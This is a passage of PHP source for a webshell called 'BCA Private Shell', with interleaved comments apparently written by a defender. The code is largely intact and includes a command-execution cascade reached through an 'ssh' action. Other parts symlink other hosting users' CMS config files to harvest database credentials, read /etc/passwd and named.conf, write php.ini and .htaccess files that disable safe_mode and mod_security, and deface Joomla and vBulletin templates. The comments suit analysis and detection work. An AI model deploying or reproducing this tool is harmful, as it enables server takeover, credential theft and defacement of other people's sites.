  861. add2file("jm_index.txt",$site.Chr(10));
  862.  
  863. $status['site'] = $site;
  864.  
  865. $status['status'] = "success";
  866.  
  867. die(json_encode($status));
  868.  
  869. }
  870.  
  871. else{
  872.  
// Update failure dump (forensic artefact): jmupd.txt holds the admin URL plus the raw response.
  873. file_put_contents("jmupd.txt",$site_url.$themeedit);
  874.  
  875. throwErr($template_name);
  876.  
  877. }
  878.  
  879. }else{
  880.  
  881. throwErr("Index not found");
  882.  
  883. }
  884.  
  885. }
  886.  
  887. else{
  888.  
  889. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  890.  
  891. $hash = $dhash[1];
  892.  
  893. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
  894.  
  895. $themepage = GetPage($url,$cookie);
  896.  
  897. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  898.  
  899. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  900.  
  901. $hash = $dhash[1];
  902.  
  903. $url=$site_url."/index.php?option=com_templates&layout=edit";
  904.  
  905. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
  906.  
  907. $themeedit = GetPage($url,$cookie,$postme);
  908.  
  909. if(preg_match('%class=\"message message fade\"%',$themeedit)){
  910.  
  911. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  912.  
  913. add2file("jm_index.txt",$site.Chr(10));
  914.  
  915. $status['site'] = $site;
  916.  
  917. $status['status'] = "success";
  918.  
  919. die(json_encode($status));
  920.  
  921. }
  922.  
  923. else{
  924.  
  925. file_put_contents("jmupd.txt",$site_url.$themeedit);
  926.  
  927. throwErr($template_name);
  928.  
  929. }
  930.  
  931. }else{
  932.  
  933. throwErr("Index not found");
  934.  
  935. }
  936.  
  937. }
  938.  
  939. }
  940.  
  941. }
  942.  
  943. }
  944.  
  945. else{
  946.  
  947. throwErr("Mysql Fail");
  948.  
  949. }
  950.  
  951. }
  952.  
  953. else{
  954.  
  955. throwErr("Config not found");
  956.  
  957. }
  958.  
  959. }
  960.  
  961. function doXploitVB($cnf,$html){
// vBulletin defacement. Reads the MasterServer username/password and Database dbname/tableprefix from
// the config, connects to MySQL on localhost and runs `UPDATE template SET template = '<html>'` with
// no WHERE clause, replacing every template row. The board URL is then pulled from the serialized
// "options" datastore row ("bburl"; the hard-coded s:34: length only matches 34-character URLs).
// $prefix is extracted but never applied to the table names. Uses mysql_* (removed in PHP 7).
// Clean-up IoC: every row of the template table containing the same payload.
  962.  
  963. $str = file_get_contents($cnf);
  964.  
  965. if(preg_match('%vBulletin%',$str)){
  966.  
  967. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
  968.  
  969. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
  970.  
  971. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
  972.  
  973. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
  974.  
  975. $link=mysql_connect("localhost",$username,$password) ;
  976.  
  977. if ($link) {
  978.  
  979. mysql_select_db($dbname,$link);
  980.  
  981. $html = str_replace('"','\\\"',$html);
  982.  
// No WHERE clause and no $prefix: the whole `template` table is overwritten.
  983. $query = "UPDATE template SET template = '".$html."'";
  984.  
  985. $result =@ mysql_query($query);
  986.  
  987. if($result){
  988.  
  989. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
  990.  
  991. $result =@ mysql_query($query);
  992.  
  993. $data = mysql_fetch_array($result);
  994.  
  995. $optionz=$data["data"];
  996.  
  997. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
  998.  
  999. $status['site'] = $site_url;
  1000.  
  1001. $status['status'] = "success";
  1002.  
  1003. die(json_encode($status));
  1004.  
  1005. }else{
  1006.  
  1007. throwErr("Update Failed");
  1008.  
  1009. }
  1010.  
  1011. }else{
  1012.  
  1013. throwErr("Mysql Fail");
  1014.  
  1015. }
  1016.  
  1017. }else{
  1018.  
  1019. throwErr("Config not found");
  1020.  
  1021. }
  1022.  
  1023. }
  1024.  
  1025. function exme($in) {
// Command-execution primitive: tries exec, passthru, system, shell_exec and finally popen, using the
// first one that is not disabled, and returns the captured output (exec output is joined with "</br>").
// This function_exists() cascade over these names is a classic webshell signature. Hardening note:
// a disable_functions list has to cover every name in the chain to be effective against it.
// NOTE(review): no caller is visible in this span — the action dispatcher at the end of the file is
// cut off.
  1026.  
  1027. $out = '';
  1028.  
  1029. if (function_exists('exec')) {
  1030.  
  1031. @exec($in,$out);
  1032.  
  1033. $out = @join("</br>",$out);
  1034.  
  1035. }elseif (function_exists('passthru')) {
  1036.  
  1037. ob_start();
  1038.  
  1039. @passthru($in);
  1040.  
  1041. $out = ob_get_clean();
  1042.  
  1043. }elseif (function_exists('system')) {
  1044.  
  1045. ob_start();
  1046.  
  1047. @system($in);
  1048.  
  1049. $out = ob_get_clean();
  1050.  
  1051. }elseif (function_exists('shell_exec')) {
  1052.  
  1053. $out = shell_exec($in);
  1054.  
  1055. }elseif (is_resource($f = @popen($in,"r"))) {
  1056.  
  1057. $out = "";
  1058.  
  1059. while(!@feof($f))
  1060.  
  1061. $out .= fread($f,1024);
  1062.  
  1063. pclose($f);
  1064.  
  1065. }
  1066.  
  1067. return $out;
  1068.  
  1069. }
  1070.  
  1071. if($_POST['ac'] == "secinfo"){
  1072.  
  1073. if(is_readable("/etc/named.conf")){
  1074.  
  1075. echo '&raquo; /etc/named.conf is readable.<br />';
  1076.  
  1077. }else{
  1078.  
  1079. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  1080.  
  1081. }
  1082.  
  1083. if(is_readable("/etc/passwd")){
  1084.  
  1085. echo '&raquo; /etc/passwd is readable.<br />';
  1086.  
  1087. }else{
  1088.  
  1089. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  1090.  
  1091. }
  1092.  
  1093. if(is_readable("/etc/valiases")){
  1094.  
  1095. echo '&raquo; /etc/valiases exists';
  1096.  
  1097. if(is_array(scandir("/etc/valiases"))){
  1098.  
  1099. echo ' & scanable';
  1100.  
  1101. }
  1102.  
  1103. echo '.<br />';
  1104.  
  1105. }else{
  1106.  
  1107. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  1108.  
  1109. }
  1110.  
  1111. if(is_readable("/var/named")){
  1112.  
  1113. echo '&raquo; /var/named exists';
  1114.  
  1115. if(is_array(scandir("/var/named"))){
  1116.  
  1117. echo ' & scanable';
  1118.  
  1119. }
  1120.  
  1121. echo '.<br />';
  1122.  
  1123. }else{
  1124.  
  1125. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  1126.  
  1127. }
  1128.  
  1129. if(ini_get('disable_functions')){
  1130.  
  1131. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  1132.  
  1133. }
  1134.  
  1135. if(function_exists("symlink")){
  1136.  
  1137. echo '&raquo; Symlinking allowed<br />';
  1138.  
  1139. }else{
  1140.  
  1141. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  1142.  
  1143. }
  1144.  
  1145. if(is_writable("/var/tmp")){
  1146.  
  1147. echo '&raquo; /var/tmp folder is writable<br />';
  1148.  
  1149. }
  1150.  
  1151. if(is_readable('/var/log')){
  1152.  
  1153. echo '&raquo; /var/log folder is readable<br />';
  1154.  
  1155. }
  1156.  
  1157. die();
  1158.  
  1159. }
  1160.  
  1161. elseif($_POST['ac'] == "sysinfo"){
  1162.  
  1163. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
  1164.  
  1165. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
  1166.  
  1167. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
  1168.  
  1169. $ssys = "None";
  1170.  
  1171. if(is_dir("/usr/local/cpanel")){
  1172.  
  1173. $ssys = "Running On Cpanel";
  1174.  
  1175. }elseif(is_dir("/usr/local/directadmin")){
  1176.  
  1177. $ssys = "Running On Directadmin";
  1178.  
  1179. }
  1180.  
  1181. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
  1182.  
  1183. if(function_exists("disk_total_space")){
  1184.  
  1185. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
  1186.  
  1187. }
  1188.  
  1189. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
  1190.  
  1191. die();
  1192.  
  1193. }
  1194.  
  1195. elseif($_POST['ac'] == "browse"){
  1196.  
  1197. error_reporting(0);
  1198.  
  1199. if($_POST['path'] != ""){
  1200.  
  1201. $path = $_POST['path'];
  1202.  
  1203. }else{
  1204.  
  1205. $path = getcwd();
  1206.  
  1207. }
  1208.  
  1209. $filez = scandir($path);
  1210.  
  1211. $q = 2;
  1212.  
  1213. foreach($filez as $mfile){
  1214.  
  1215. if($q == 2){$q = 1;}else{$q = 2;}
  1216.  
  1217. $npath = $_POST['path'].$mfile;
  1218.  
  1219. $stat = stat($npath);
  1220.  
  1221. $usr = posix_getpwuid($stat['uid']);
  1222.  
  1223. $grp = posix_getpwuid($stat['gid']);
  1224.  
  1225. if(is_dir($npath)){
  1226.  
  1227. $size = "Dir";
  1228.  
  1229. }else{
  1230.  
  1231. $size = convertByte($stat['size']);
  1232.  
  1233. }
  1234.  
  1235. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
  1236.  
  1237. if(!$fperm){
  1238.  
  1239. $fperm = "<font color='red'>Restricted</font>";
  1240.  
  1241. }elseif(is_writeable($npath)){
  1242.  
  1243. $fperm = "<font color='#28FE14'>".$fperm."</font>";
  1244.  
  1245. }elseif(is_readable($npath)){
  1246.  
  1247. $fperm = "<font color='yellow'>".$fperm."</font>";
  1248.  
  1249. }
  1250.  
  1251. echo '<div class="filetable">
  1252.  
  1253. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
  1254.  
  1255. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
  1256.  
  1257. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
  1258.  
  1259. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
  1260.  
  1261. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
  1262.  
  1263. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
  1264.  
  1265. </div>';
  1266.  
  1267. }
  1268.  
  1269. die();
  1270.  
  1271. }
  1272.  
  1273. elseif($_POST['ac'] == "chknamed"){
  1274.  
  1275. error_reporting(0);
  1276.  
  1277. if(is_readable("/etc/named.conf")){
  1278.  
  1279. $named = file_get_contents("/etc/named.conf");
  1280.  
  1281. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1282.  
  1283. foreach($domains[1] as $domain){
  1284.  
  1285. $domain = trim($domain);
  1286.  
  1287. $i += 1;
  1288.  
  1289. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1290.  
  1291. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1292.  
  1293. }
  1294.  
  1295. echo "Total Domains Found: ".$i."<br />".$dn;
  1296.  
  1297. die();
  1298.  
  1299. }
  1300.  
  1301. elseif(is_readable("/etc/valiases")){
  1302.  
  1303. $list = scandir("/etc/valiases");
  1304.  
  1305. foreach($list as $domain){
  1306.  
  1307. $i += 1;
  1308.  
  1309. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1310.  
  1311. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1312.  
  1313. }
  1314.  
  1315. echo "Total Domains Found: ".$i."<br />".$dn;
  1316.  
  1317. die();
  1318.  
  1319. }
  1320.  
  1321. elseif(is_readable("/var/named")){
  1322.  
  1323. $list = scandir("/var/named");
  1324.  
  1325. foreach($list as $domain){
  1326.  
  1327. if(strpos($domain,".db")){
  1328.  
  1329. $i += 1;
  1330.  
  1331. $domain = str_replace('.db','',$domain);
  1332.  
  1333. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1334.  
  1335. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  1336.  
  1337. }
  1338.  
  1339. }
  1340.  
  1341. echo "Total Domains Found: ".$i."<br />".$dn;
  1342.  
  1343. die();
  1344.  
  1345. }
  1346.  
  1347. else{
  1348.  
  1349. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
  1350.  
  1351. }
  1352.  
  1353. }
  1354.  
  1355. elseif($_POST['ac'] == "safebypass"){
  1356.  
  1357. $byphp = "safe_mode = Off
  1358.  
  1359. disable_functions =
  1360.  
  1361. safe_mode_gid = OFF
  1362.  
  1363. open_basedir = OFF
  1364.  
  1365. allow_url_fopen = On";
  1366.  
  1367. $byht = "<IfModule mod_security.c>
  1368.  
  1369. SecFilterEngine Off
  1370.  
  1371. SecFilterScanPOST Off
  1372.  
  1373. SecFilterCheckURLEncoding Off
  1374.  
  1375. SecFilterCheckUnicodeEncoding Off
  1376.  
  1377. </IfModule>";
  1378.  
  1379. file_put_contents("php.ini",$byphp);
  1380.  
  1381. file_put_contents(".htaccess",$byht);
  1382.  
  1383. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
  1384.  
  1385. die();
  1386.  
  1387. }
  1388.  
  1389. elseif($_POST['ac'] == "chkph"){
  1390.  
  1391. if(is_readable("/etc/passwd")){
  1392.  
  1393. if(!is_dir("bca")){
  1394.  
  1395. @mkdir('bca',0777);
  1396.  
  1397. }
  1398.  
  1399. $htaccss = "Options all
  1400.  
  1401. DirectoryIndex Sux.html
  1402.  
  1403. AddType text/plain .php
  1404.  
  1405. AddHandler server-parsed .php
  1406.  
  1407. AddType text/plain .html
  1408.  
  1409. AddHandler txt .html
  1410.  
  1411. Require None
  1412.  
  1413. Satisfy Any";
  1414.  
  1415. file_put_contents("bca/.htaccess",$htaccss);
  1416.  
  1417. $etc = file_get_contents("/etc/passwd");
  1418.  
  1419. $etcz = explode("\n",$etc);
  1420.  
  1421. foreach($etcz as $etz){
  1422.  
  1423. $etcc = explode(":",$etz);
  1424.  
  1425. error_reporting(0);
  1426.  
  1427. if($enable_wp){
  1428.  
  1429. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  1430.  
  1431. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  1432.  
  1433. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  1434.  
  1435. }
  1436.  
  1437. if($enable_phpbb){
  1438.  
  1439. symlink('/home/'.$etcc[0].'/public_html/config.php',"bca/".$etcc[0].'-PhpBB.txt');
  1440.  
  1441. }
  1442.  
  1443. if($enable_vb){
  1444.  
  1445. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"bca/".$etcc[0].'-vBulletin.txt');
  1446.  
  1447. }
  1448.  
  1449. if($enable_joomla){
  1450.  
  1451. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  1452.  
  1453. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  1454.  
  1455. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  1456.  
  1457. }
  1458.  
  1459. }
  1460.  
  1461. $lol = explode("/",curPageURL());
  1462.  
  1463. $link = str_replace(end($lol),"",curPageURL());
  1464.  
  1465. $str = file_get_contents($link."/bca");
  1466.  
  1467. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
  1468.  
  1469. if(is_array($exp[2])){
  1470.  
  1471. $q = 2;
  1472.  
  1473. $dmn = getDnamed();
  1474.  
  1475. foreach($exp[2] as $sitez){
  1476.  
  1477. if($q == 2){$q = 1;}else{$q = 2;}
  1478.  
  1479. $j += 1;
  1480.  
  1481. $sn = explode("-",$sitez);
  1482.  
  1483. $domain = $dmn[$sn[0]];
  1484.  
  1485. if($domain){
  1486.  
  1487. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
  1488.  
  1489. }else{
  1490.  
  1491. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
  1492.  
  1493. }
  1494.  
  1495. $nan .= '<div id="inj'.$j.'">
  1496.  
  1497. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
  1498.  
  1499. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
  1500.  
  1501. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'bca/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
  1502.  
  1503. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
  1504.  
  1505. </div>';
  1506.  
  1507. }
  1508.  
  1509. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
  1510.  
  1511. echo $nan.$cnt;
  1512.  
  1513. }
  1514.  
  1515. }
  1516.  
  1517. die();
  1518.  
  1519. }
  1520.  
  1521. elseif($_POST['ac'] == "chkph2"){
  1522.  
  1523. if(is_readable("/etc/passwd")){
  1524.  
  1525. if(!is_dir("bca")){
  1526.  
  1527. @mkdir('bca',0777);
  1528.  
  1529. }
  1530.  
  1531. if(!is_link("bca/root")){
  1532.  
  1533. $sym = symlink("/","bca/root");
  1534.  
  1535. if(!$sym){
  1536.  
  1537. die("Symlink method failed.");
  1538.  
  1539. }
  1540.  
  1541. }
  1542.  
  1543. $htaccss = "Options all
  1544.  
  1545. DirectoryIndex Sux.html
  1546.  
  1547. AddType text/plain .php
  1548.  
  1549. AddHandler server-parsed .php
  1550.  
  1551. AddType text/plain .html
  1552.  
  1553. AddHandler txt .html
  1554.  
  1555. Require None
  1556.  
  1557. Satisfy Any";
  1558.  
  1559. file_put_contents("bca/.htaccess",$htaccss);
  1560.  
  1561. $etc = file_get_contents("/etc/passwd");
  1562.  
  1563. $etcz = explode("\n",$etc);
  1564.  
  1565. $lol = explode("/",curPageURL());
  1566.  
  1567. $link = str_replace(end($lol),"",curPageURL());
  1568.  
  1569. @unlink("rootinject.tmp");
  1570.  
  1571. $q = 2;
  1572.  
  1573. $dmn = getDnamed();
  1574.  
  1575. foreach($etcz as $etz){
  1576.  
  1577. $etcc = explode(":",$etz);
  1578.  
  1579. $dr = "bca/root/home/".$etcc[0]."/public_html/";
  1580.  
  1581. $dan = chkSys($link.$dr);
  1582.  
  1583. if($dan){
  1584.  
  1585. if($q == 2){$q = 1;}else{$q = 2;}
  1586.  
  1587. $domain = $dmn[$etcc[0]];
  1588.  
  1589. if($domain){
  1590.  
  1591. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
  1592.  
  1593. }else{
  1594.  
  1595. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
  1596.  
  1597. }
  1598.  
  1599. $k += 1;
  1600.  
  1601. $nant = '<div id="inj'.$k.'">
  1602.  
  1603. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
  1604.  
  1605. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
  1606.  
  1607. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
  1608.  
  1609. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
  1610.  
  1611. </div>';
  1612.  
  1613. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
  1614.  
  1615. $nan .= $nant;
  1616.  
  1617. }
  1618.  
  1619. }
  1620.  
  1621. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
  1622.  
  1623. echo $nan.$cnt;
  1624.  
  1625. }
  1626.  
  1627. die();
  1628.  
  1629. }
  1630.  
  1631. elseif($_POST['ac'] == "inject"){
  1632.  
  1633. error_reporting(0);
  1634.  
  1635. $cms = strtolower($_POST['cms']);
  1636.  
  1637. $cnf = $_POST['conf'];
  1638.  
  1639. if(file_exists(md5($_POST['deface_page']))){
  1640.  
  1641. $html = file_get_contents(md5($_POST['deface_page']));
  1642.  
  1643. }else{
  1644.  
  1645. $html = file_get_contents($_POST['deface_page']);
  1646.  
  1647. file_put_contents(md5($_POST['deface_page']),$html);
  1648.  
  1649. file_put_contents("bca.html",$html);
  1650.  
  1651. }
  1652.  
  1653. if(!is_dir("cookie")){
  1654.  
  1655. @mkdir("cookie",0777);
  1656.  
  1657. }
  1658.  
  1659. switch($cms){
  1660.  
  1661. case "wordpress":
  1662.  
  1663. doXploitWP($cnf,$html,"uradhura123");
  1664.  
  1665. break;
  1666.  
  1667. case "joomla":
  1668.  
  1669. doXploitJM($cnf,$html,"uradhura123");
  1670.  
  1671. break;
  1672.  
  1673. case "vbulletin":
  1674.  
  1675. doXploitVB($cnf,$html);
  1676.  
  1677. break;
  1678.  
  1679. case "phpbb":
  1680.  
  1681. break;
  1682.  
  1683. case "ipb":
  1684.  
  1685. break;
  1686.  
  1687. case "mybb":
  1688.  
  1689. break;
  1690.  
  1691. case "oscommerce":
  1692.  
  1693. break;
  1694.  
  1695. case "smf":
  1696.  
  1697. break;
  1698.  
  1699. case "drupal":
  1700.  
  1701. break;
  1702.  
  1703. case "seditio":
  1704.  
  1705. break;
  1706.  
  1707. case "e107":
  1708.  
  1709. break;
  1710.  
  1711. }
  1712.  
  1713. throwErr("Not Added");
  1714.  
  1715. }
  1716.  
  1717. elseif($_POST['ac'] == "ssh"){
  1718.  
  1719. $ssh = exme($_POST['command']);
  1720.  
  1721. die(nl2br($ssh));
  1722.  
  1723. }
  1724.  
  1725. elseif($_POST['ac'] == "phpinfo"){
  1726.  
  1727. $php = phpinfo();
  1728.  
  1729. die($php);
  1730.  
  1731. }
  1732.  
  1733. ;echo '<html>
  1734.  
  1735. <title>BCA Private Shell</title>
  1736.  
  1737. <head>
  1738.  
  1739. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
  1740.  
  1741. </head>
  1742.  
  1743. <body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
  1744.  
  1745. <style>
  1746.  
  1747. body{
  1748.  
  1749. font-family: "courier new";
  1750.  
  1751. background-color: black;
  1752.  
  1753. font-size:80%;
  1754.  
  1755. color: #28FE14;
  1756.  
  1757. background-image: url("data:image/gif;base64,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");
  1758.  
  1759. }
  1760.  
  1761. #sysinfo{
  1762.  
  1763. border: 1px solid #28FE14;
  1764.  
  1765. position:fixed;
  1766.  
  1767. padding:2px;
  1768.  
  1769. top:1px;
  1770.  
  1771. left:1px;
  1772.  
  1773. background-color: black;
  1774.  
  1775. font-size:12px;
  1776.  
  1777. }
  1778.  
  1779. #phpinfo{
  1780.  
  1781. border: 1px solid #28FE14;
  1782.  
  1783. position:fixed;
  1784.  
  1785. padding:2px;
  1786.  
  1787. top:1px;
  1788.  
  1789. right:1px;
  1790.  
  1791. background-color: black;
  1792.  
  1793. font-size:12px;
  1794.  
  1795. }
  1796.  
  1797. #status{
  1798.  
  1799. border: 1px solid #28FE14;
  1800.  
  1801. position:fixed;
  1802.  
  1803. padding:2px;
  1804.  
  1805. bottom:1px;
  1806.  
  1807. right:1px;
  1808.  
  1809. background-color: black;
  1810.  
  1811. font-size:12px;
  1812.  
  1813. }
  1814.  
  1815. #infobox{
  1816.  
  1817. z-index:1;
  1818.  
  1819. border: 1px solid white;
  1820.  
  1821. margin-left:auto;
  1822.  
  1823. margin-right:auto;
  1824.  
  1825. margin-top:50px;
  1826.  
  1827. width:600px;
  1828.  
  1829. background-color: black;
  1830.  
  1831. font-size:12px;
  1832.  
  1833. }
  1834.  
  1835. .infotitle{
  1836.  
  1837. padding:4px;
  1838.  
  1839. background-color: white;
  1840.  
  1841. color: black;
  1842.  
  1843. font-family: Thaoma;
  1844.  
  1845. font-size:14px;
  1846.  
  1847. }
  1848.  
  1849. .infotxt{
  1850.  
  1851. padding:5px;
  1852.  
  1853. }
  1854.  
  1855.  
  1856.  
  1857. .sidebar{
  1858.  
  1859. position:fixed;
  1860.  
  1861. left:1px;
  1862.  
  1863. top:30%;
  1864.  
  1865. }
  1866.  
  1867. .stitle{
  1868.  
  1869. float:left;
  1870.  
  1871. cursor:pointer;
  1872.  
  1873. padding:7px;
  1874.  
  1875. color:black;
  1876.  
  1877. background-color: white;
  1878.  
  1879. }
  1880.  
  1881. .stitle:hover{
  1882.  
  1883. color:red;
  1884.  
  1885. }
  1886.  
  1887. .smnu{
  1888.  
  1889. display:none;
  1890.  
  1891. background-color: black;
  1892.  
  1893. padding:5px;
  1894.  
  1895. border: 1px solid white;
  1896.  
  1897. float:left;
  1898.  
  1899. }
  1900.  
  1901. a{
  1902.  
  1903. color: #df5;
  1904.  
  1905. text-decoration: none;
  1906.  
  1907. }
  1908.  
  1909. a:hover{
  1910.  
  1911. color:white;
  1912.  
  1913. }
  1914.  
  1915. .copyright{
  1916.  
  1917. position:fixed;
  1918.  
  1919. bottom:1px;
  1920.  
  1921. left:1px;
  1922.  
  1923. padding:2px;
  1924.  
  1925. }
  1926.  
  1927. .logo{
  1928.  
  1929. margin:auto;
  1930.  
  1931. width:600px;
  1932.  
  1933. height:600px;
  1934.  
  1935. background-image: url("http://4.bp.blogspot.com/-DEFzMZtxffI/Tz11pJscP9I/AAAAAAAAAIQ/4UKKPprIg5U/s1600/jh3gj7.gif");
  1936.  
  1937. }
  1938.  
  1939. .filetable{
  1940.  
  1941. margin-top:2px;
  1942.  
  1943. width:740px;
  1944.  
  1945. }
  1946.  
  1947. .tblcnt{
  1948.  
  1949. text-align: center;
  1950.  
  1951. margin-left:2px;
  1952.  
  1953. color:black;
  1954.  
  1955. background-color: white;
  1956.  
  1957. padding:3px;
  1958.  
  1959. float:left;
  1960.  
  1961. border: 1px solid white;
  1962.  
  1963. }
  1964.  
  1965. .tblbx1{
  1966.  
  1967. height:12px;
  1968.  
  1969. text-align: center;
  1970.  
  1971. margin-left:2px;
  1972.  
  1973. color:white;
  1974.  
  1975. background-color: #333333;
  1976.  
  1977. padding:3px;
  1978.  
  1979. float:left;
  1980.  
  1981. border: 1px solid #333333;
  1982.  
  1983. }
  1984.  
  1985. .tblbx2{
  1986.  
  1987. height:12px;
  1988.  
  1989. text-align: center;
  1990.  
  1991. margin-left:2px;
  1992.  
  1993. color:white;
  1994.  
  1995. background-color: #444444;
  1996.  
  1997. padding:3px;
  1998.  
  1999. float:left;
  2000.  
  2001. border: 1px solid #444444;
  2002.  
  2003. }
  2004.  
  2005.  
  2006.  
  2007. .tbl{
  2008.  
  2009. margin-top:100px;
  2010.  
  2011. padding-top:2px;
  2012.  
  2013. padding-bottom: 2px;
  2014.  
  2015. margin:auto;
  2016.  
  2017. width:742px;
  2018.  
  2019. border: 1px solid white;
  2020.  
  2021. }
  2022.  
  2023. .rbox{
  2024.  
  2025. float:left;
  2026.  
  2027. border: 1px solid #28FE14;
  2028.  
  2029. padding:10px;
  2030.  
  2031. }
  2032.  
  2033. .smit{
  2034.  
  2035. background-color: black;
  2036.  
  2037. color: #28FE14;
  2038.  
  2039. }
  2040.  
  2041. .sshbox{
  2042.  
  2043. display:none;
  2044.  
  2045. padding-left:7px;
  2046.  
  2047. width:600px;
  2048.  
  2049. height:400px;
  2050.  
  2051. margin: auto;
  2052.  
  2053. margin-top:80px;
  2054.  
  2055. -webkit-border-radius: 10px;
  2056.  
  2057. -moz-border-radius: 10px;
  2058.  
  2059. border-radius: 10px;
  2060.  
  2061. border:3px solid #FFF5F5;
  2062.  
  2063. background-color:#080500;
  2064.  
  2065. overflow:auto;
  2066.  
  2067. }
  2068.  
  2069. #sshcmd{
  2070.  
  2071. width:450px;
  2072.  
  2073. background-color: #080500;
  2074.  
  2075. color:#28FE14;
  2076.  
  2077. border:none;
  2078.  
  2079. }
  2080.  
  2081.  
  2082.  
  2083. </style>
  2084.  
  2085. <body>
  2086.  
  2087. <div class="logo" id="logo"></div>
  2088.  
  2089. <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." / ".php_uname("m");;echo '</div>
  2090.  
  2091.  
  2092.  
  2093. <div id="phpinfo"> ';
  2094. // Server fingerprint banner for the "#phpinfo" box. Defender note: the fixed strings emitted here ("Safe Mode On"/"Safe Mode Off" wrapped in <font> tags, directly after the PHP version) are stable response-body markers for detecting this shell's main page.
  2095. $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']); // split the server banner on spaces; only the first token is printed below
  2096.  
  2097. echo $srvsoft[0];
  2098.  
  2099. echo " PHP ".phpversion();
  2100.  
  2101. if( ini_get('safe_mode') ){ // safe_mode was removed in PHP 5.4, so on any modern PHP ini_get() returns false and the "Off" branch is always taken
  2102.  
  2103. echo " <font color='red'>Safe Mode On</font>";
  2104.  
  2105. }else{
  2106.  
  2107. echo " <font color='blue'>Safe Mode Off</font>";
